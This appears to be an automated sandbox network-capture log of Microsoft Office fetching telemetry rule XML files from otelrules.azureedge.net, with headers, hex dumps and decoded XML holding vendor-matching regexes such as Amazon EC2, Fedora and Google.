                                                                                                                                                                                                                                                    2024-10-29 12:08:27 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:28 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 425
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BBA25094F"
                                                                                                                                                                                                                                                    x-ms-request-id: 2b9d96d3-301e-0020-4e31-276299000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120828Z-16849878b78j7llf5vkyvvcehs00000007mg000000006x5w
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:28 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    58192.168.2.54978313.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:28 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:28 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 491
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582B98B88612"
                                                                                                                                                                                                                                                    x-ms-request-id: 39d89106-201e-003f-20a3-266d94000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120828Z-16849878b78wc6ln1zsrz6q9w8000000064g00000000bcmr
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:28 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    59192.168.2.54978413.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:28 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:28 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:28 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 416
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BAEA4B445"
                                                                                                                                                                                                                                                    x-ms-request-id: a1cd263b-b01e-0070-5f2a-271cc0000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120828Z-16849878b785dznd7xpawq9gcn00000007y0000000005bbd
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:28 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    60192.168.2.54978613.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:28 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:28 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 479
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582B989EE75B"
                                                                                                                                                                                                                                                    x-ms-request-id: 18fe904c-c01e-00a1-4257-277e4a000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120828Z-15b8d89586f4zwgbgswvrvz4vs00000007vg0000000021wz
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:28 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    61192.168.2.54978713.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:28 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:28 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 415
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                                                                                    x-ms-request-id: 3802ff33-701e-0001-4310-28b110000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120828Z-r197bdfb6b466qclztvgs64z10000000084g000000003uzm
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:28 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    62192.168.2.54978813.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:28 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:28 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 471
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582B97E6FCDD"
                                                                                                                                                                                                                                                    x-ms-request-id: 9e4d4e08-401e-0047-1d64-278597000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120828Z-16849878b78wv88bk51myq5vxc00000006p000000000h16g
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:29 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    63192.168.2.54978913.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:28 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:28 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 419
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582B9C710B28"
                                                                                                                                                                                                                                                    x-ms-request-id: 86dc56c9-201e-00aa-5987-283928000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120828Z-15b8d89586f5s5nz3ffrgxn5ac0000000770000000004nyt
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:29 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    64192.168.2.54979013.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:28 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:28 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 477
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BA54DCC28"
                                                                                                                                                                                                                                                    x-ms-request-id: 9921b831-601e-0097-069c-27f33a000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120828Z-16849878b78g2m84h2v9sta29000000005bg00000000cng0
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:29 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    65192.168.2.54979113.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:29 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:29 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:29 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 419
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BB7F164C3"
                                                                                                                                                                                                                                                    x-ms-request-id: 57989b77-d01e-0049-621c-27e7dc000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120829Z-16849878b78tg5n42kspfr0x4800000006gg000000008c3y
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:29 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    66192.168.2.54979213.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:29 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:29 UTC470INHTTP/1.1 200 OK
